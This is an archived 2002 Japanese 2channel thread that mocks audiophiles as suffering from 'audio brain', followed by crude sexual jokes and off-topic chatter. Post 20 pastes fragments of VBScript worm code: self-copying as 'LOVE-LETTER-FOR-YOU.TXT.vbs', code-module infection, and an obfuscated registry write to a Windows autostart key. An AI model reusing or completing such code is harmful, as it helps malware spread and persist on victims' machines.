5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【毒音波】))))オーディオ脳((((【毒音波】

1 :音波使い:02/12/11 20:45 ID:???

           _,..:―--、_
          ,r''":::::::::::::::/、::`ヽ、
        ,r":::::::::::::;;;;:::!'゙ヾ:;;:::::::::ヽ
       ,i":::::::;;r-''""     ヾ::;::::::i
       i::::::;'"      ,,,::;;;;、_ヾ:::::|
       !;::::l ,-'''""`‐;-i'",,,,,、_`i‐!::::!
       ヾ::l-! '""` ノ ヽ、  _,.! ゙ゞ!
        ヾ! `ー‐‐'   ヽ ̄  l/    音波、届いた?
         `i.  ,:' _`__"__, ノ  ,!    
          !  ``'、'_'_',.'ノゝ ,r'
          `>、     //::ヽ..,__
    _,,-―' ̄/:::i 、`ー'-'''//:::::::::|:::::::::`‐..、__
  ,r'":::::::::::::::/:::::::/i ` 、,r''" /::::::::::::|::::::::::::::::::::::::`,ヽ
  /::i::::::::::::::/::::::::/:::i /"ヽ /ヽ:::::::::::|::::::::::::::::/::::::::::
 /::::i::::::::::::ヽ::::/:::::::i、/ヾ `i /::::ヽ::::::::;!::::::::::::/::::::::::::::::


2 :名無しさん@お腹いっぱい。:02/12/11 20:55 ID:???
2げっと



3 :名無しさん@お腹いっぱい。:02/12/11 21:32 ID:okn5yzir
本当に危ない!オーディオ脳の恐怖

脳の中で35%を占める前頭葉の中に前頭前野という、
さまざまな命令を身体全体に出す司令塔がある。
この司令塔が、オーディオに熱中しすぎると働かなくなり、
いわゆる「オーディオ脳」と呼ばれる状態になるのだ。
「キレやすい」「集中力がない」「注意力散漫」「羞恥心欠如」「その日暮らし」「無気力」
という症状がオーディオ脳の特徴である。どこか思い当たるところがありませんか?

4 :名無しさん@お腹いっぱい。:02/12/11 21:32 ID:???
おらおらおらおら

ぷーう

5 :名無しさん@お腹いっぱい。:02/12/11 21:40 ID:rBomGrma
真の5をゲット

6 :名無しさん@お腹いっぱい。:02/12/11 21:44 ID:???
ここで何を議論すれば良いのだ?

7 :名無しさん@お腹いっぱい。:02/12/12 00:23 ID:???
ここの住人がどれほど毒音波に蝕まれているのかだな。
とりあえず思い当たる症状・使用機器・使用期間を晒してくれ。

8 :名無しさん@お腹いっぱい。:02/12/12 00:25 ID:???
さーげましょ。

9 :名無しさん@お腹いっぱい。:02/12/12 10:04 ID:???
パイオニアのピュアモルトSPとラックスのアンプとVRDSで音楽を聴いていますが
最近真夜中のリスニング中寝てしまう事が多いです

10 :名無しさん@お腹いっぱい。:02/12/12 10:47 ID:???
チョトわらたよ。
ここの住人だったら、「ゲーム脳の恐怖」を知らない方もいるかも。

オーディオ脳の恐怖はここまで来た! 女たちはなぜパンツを見せるのか。
ってとこか?
ま、子供にはオーディオに触れさせず、野山でイキイキと遊ばせろ、ってこった。

11 :名無しさん@お腹いっぱい。:02/12/12 21:03 ID:???
「オマンコ」は果たして本当に存在するのか?
女性の又の間にあるらしいんだが、もちろん俺は実物を見たことがない。
いや、それだけならまだ存在を信じることもできるんだが、さっき気がついたんだ。
「オマンコは存在しない」んだと。
 その根拠を幾つか述べよう。
1.女は絶対に「オマンコ」を見せたがらない。それも不自然なほど隠す。
  あの嫌がり方は尋常ではない。女子小学生ですら見せるのを嫌がるではないか。
2.AVを見ていても「オマンコ」の部分には必ずモザイクが
  かかっており、われわれは「オマンコ」を目にする事が出来ない。
  これこそが「オマンコ」が存在しない何よりの証拠ではないだろうか。
3.日常生活で「オマンコ」という言葉をひとたび発すると、
  法律で禁じられた行為であるかのような嫌悪の視線を受ける。
  しかも公共放送でも「オマンコ」は放送禁止用語となっている。
  これも明らかにおかしい。
   俺は確信した。「オマンコ」は絶対に存在しない。
 ・・これでもあなたは「オマンコ」を信じますか?.........

12 :名無しさん@お腹いっぱい。:02/12/12 21:11 ID:???
ななんだって・・・おオマンコは存在しないなんて嘘だ
オラのSPにはバスレフマンコって穴が空いてるぞ


13 :名無しさん@お腹いっぱい。:02/12/13 01:33 ID:???
ん、どうした?
オーディオ脳だと認めたくないのは解るが、ちゃんと正面から向き合わないとな。

それとも現実逃避するのもオーディオ脳の症状か?

14 :名無しさん@お腹いっぱい。:02/12/13 04:26 ID:???
なんだと!(´・ω・`)ショボーン


15 :名無しさん@お腹いっぱい。:02/12/13 08:41 ID:???
>>12
漏れも愛用のSPにティムポをいれてみたが
ガイジンだからか,ガバガバだった。

16 :名無しさん@お腹いっぱい。:02/12/13 19:38 ID:???
ノーチラスは良いよね
あのディンプルの付いたボコボコの刺激がたまらないよ
ありゃ名器だよ


17 :名無しさん@お腹いっぱい。:02/12/13 20:50 ID:???
オーディオ脳の恐怖はここまで来た! オーオタどもはなぜティムポををスピーカーに入れるのか!?


18 :名無しさん@お腹いっぱい。:02/12/13 22:26 ID:???
南極2号買う銭をSPに廻しているからに決ってんだろ

19 :名無しさん@お腹いっぱい。:02/12/14 22:17 ID:???
オーオタってマジで逝かれてんじゃねーの?

20 :名無しさん@お腹いっぱい。:02/12/15 00:46 ID:???
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

21 :名無しさん@お腹いっぱい。:02/12/18 02:26 ID:???
オーオタって良い音を聞きたいわけ?
それなら麻薬でも覚醒剤でもやれば良い音がどっかから聞こえてくんじゃない?

22 :名無しさん@お腹いっぱい。:02/12/18 02:35 ID:???
>>21
それどころか、音になれるよ

6 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)